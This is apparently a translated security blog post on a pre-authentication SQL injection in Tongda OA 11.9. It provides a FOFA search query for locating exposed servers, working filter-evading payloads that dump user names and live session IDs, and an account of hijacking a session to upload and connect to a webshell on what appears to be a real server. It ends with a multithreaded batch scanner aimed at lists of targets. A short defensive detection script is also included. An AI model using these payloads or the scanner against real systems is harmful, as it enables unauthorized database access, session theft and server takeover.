Tongda OA 11.9 pre-auth (front-end) SQL injection

0x01 Preface

Tongda OA (Office Anywhere network intelligent office system) is collaborative office-automation software developed in-house by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management and office platform built around Chinese enterprise management practice.

The Tongda OA front end (reachable without authentication) has a SQL injection vulnerability. An attacker can use it to read sensitive database contents and, by chaining it with a post-auth upload, obtain code execution on the server.

0x02 Affected version

Tongda OA 11.9

0x03 FOFA query

icon_hash="-759108386" or "tongda.ico"

0x04 Reproduction

The injection point is the tab parameter of get_datas.php. The SQL keywords in the payload are broken up with backslashes (whe\re, un\ion, s\elect, fr\om) so that they get past the keyword filter. First, a payload that pulls user_name and byname from the user table:

/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 whe\re 1={`\='` 1} un\ion (s\elect user_name,byname fr\om user whe\re 1\={`=` 1})-- '


The next payload reads uid and sid from the user_online table. The sid is the session ID of a currently logged-in user, so it can be used directly as that user's cookie; with the copied cookie, a custom tool exploits the backend (post-auth) file-upload vulnerability to get a shell:

/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 whe\re 1={`\='` 1} un\ion (s\elect uid,sid fr\om user_online whe\re 1\={`=` 1})-- '
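As an added example (not code from this post or from Tongda OA), the block below models why the backslash-split payload above works against a keyword blacklist, and how a detection rule has to normalise the parameter before matching. The blacklist is a model of the class of check the payload evades, not Tongda's actual filter, and the request targets and access-log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Keyword blacklist modelling the kind of filter the backslash trick evades (assumption)
SQL_KEYWORDS = ("union", "select", "from", "where")

# Constructed sample request targets (not captured traffic): a benign call,
# the page's backslash-split payload, and the same injection without backslashes.
SAMPLE_REQUESTS = [
    "/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5",
    r"/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1"
    r"&tab=5 whe\re 1={`\='` 1} un\ion (s\elect uid,sid fr\om user_online whe\re 1\={`=` 1})-- '",
    "/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1"
    "&tab=5 where 1={`='` 1} union (select uid,sid from user_online where 1={`=` 1})-- '",
]

# Constructed Apache-style access-log lines (not real traffic); the second line
# carries the payload URL-encoded the way a browser or requests would send it.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Oct/2021:23:07:31 +0800] "GET /general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 HTTP/1.1" 200 42
10.0.0.9 - - [11/Oct/2021:23:24:55 +0800] "GET /general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5%20whe%5Cre%201=%7B%60%5C=%27%60%201%7D%20un%5Cion%20(s%5Celect%20uid,sid%20fr%5Com%20user_online%20whe%5Cre%201%5C=%7B%60=%60%201%7D)--%20%27 HTTP/1.1" 200 160
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def tab_param(target):
    """Return the decoded value of the tab parameter from a request target."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return query.get("tab", [""])[0]


def naive_blacklist_blocks(value):
    """Blacklist that matches whole keywords only: keywords broken up by a backslash slip through."""
    lowered = value.lower()
    return any(kw in lowered for kw in SQL_KEYWORDS)


def normalize(value):
    """Undo the evasion before matching: drop backslashes and fold case."""
    return value.replace("\\", "").lower()


def normalized_blacklist_blocks(value):
    """Same blacklist applied after normalisation; catches the split keywords."""
    return naive_blacklist_blocks(normalize(value))


def classify(target):
    """Verdict of both filters for the tab parameter of one request target."""
    tab = tab_param(target)
    return {
        "naive_blocked": naive_blacklist_blocks(tab),
        "normalized_blocked": normalized_blacklist_blocks(tab),
    }


def flag_log_lines(log_text):
    """Return (client_ip, decoded tab value) for get_datas.php requests whose
    tab parameter contains SQL keywords once normalised."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.group(1), m.group(2)
        if (urlsplit(target).path.endswith("/general/reportshop/utils/get_datas.php")
                and classify(target)["normalized_blocked"]):
            hits.append((ip, tab_param(target)))
    return hits


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(classify(req), repr(tab_param(req)[:40]))
    for ip, tab in flag_log_lines(SAMPLE_LOG):
        print("suspicious get_datas.php request from", ip, ":", tab)
```

The point for a detection engineer is the second sample: the naive check sees nothing, while the same keywords are obvious once the backslashes are removed. Any rule written against raw query strings for this endpoint should normalise the same way, and the same normalisation is the minimum a server-side fix has to do before applying a blacklist (a parameterised query rather than a blacklist is the real fix).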


Finally, the tool is used to upload the shell.


Connecting with 冰蝎 (Behinder) gives a working webshell.


I was about to delete my shell and leave, only to find the box was already a racetrack (马, "horse", is slang for a webshell).


Far too many webshells on it. Poor Tongda OA.


0x05 Batch PoC

# -*- coding: utf-8 -*-
# @Date     :2021/10/11 22:36
# @Author   :AD钙奶

import time
from queue import Queue
from threading import Thread, active_count
import requests
from urllib3.exceptions import InsecureRequestWarning

# Targets often run self-signed certificates; verification is skipped (verify=False)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Affected version
# Tongda OA 11.9

# Raw string so the backslashes that split the SQL keywords reach the server unchanged
PAYLOAD = r"/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 whe\re 1={`\='` 1} un\ion (s\elect uid,sid fr\om user_online whe\re 1\={`=` 1})-- '"

HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Connection': 'close',
    'Accept-Encoding': 'gzip, deflate',
}


def _POC(target_url):
    core_url = target_url.rstrip('/') + PAYLOAD
    try:
        # These are request headers, so they go in headers= (not data=); a GET carries no body
        response = requests.get(url=core_url, headers=HEADERS, timeout=10, verify=False)
        # A vulnerable host echoes the injected constant columns ("1;1") in the result
        if response.status_code == 200 and '1;1' in response.text:
            print("\033[36m[+] SQL injection present : {} \033[0m".format(target_url))
            save_vuln(target_url)
    except Exception:
        pass


def get_file_url():
    # One target per line, e.g. http://host:port
    with open('url.txt', 'r', encoding='utf-8') as f:
        urls = f.readlines()
    return [url.strip() for url in urls if url and url.strip()]


def save_vuln(url):
    with open('result.txt', 'a') as ff:
        ff.write(url + '\n')


def main():
    queue = Queue()
    for target in get_file_url():
        queue.put(target)
    workers = []
    while not queue.empty():
        # Cap concurrency at 50 threads; sleep instead of spinning while they are busy
        if active_count() <= 50:
            t = Thread(target=_POC, args=(queue.get(),))
            t.start()
            workers.append(t)
        else:
            time.sleep(0.1)
    for t in workers:
        t.join()


if __name__ == '__main__':
    main()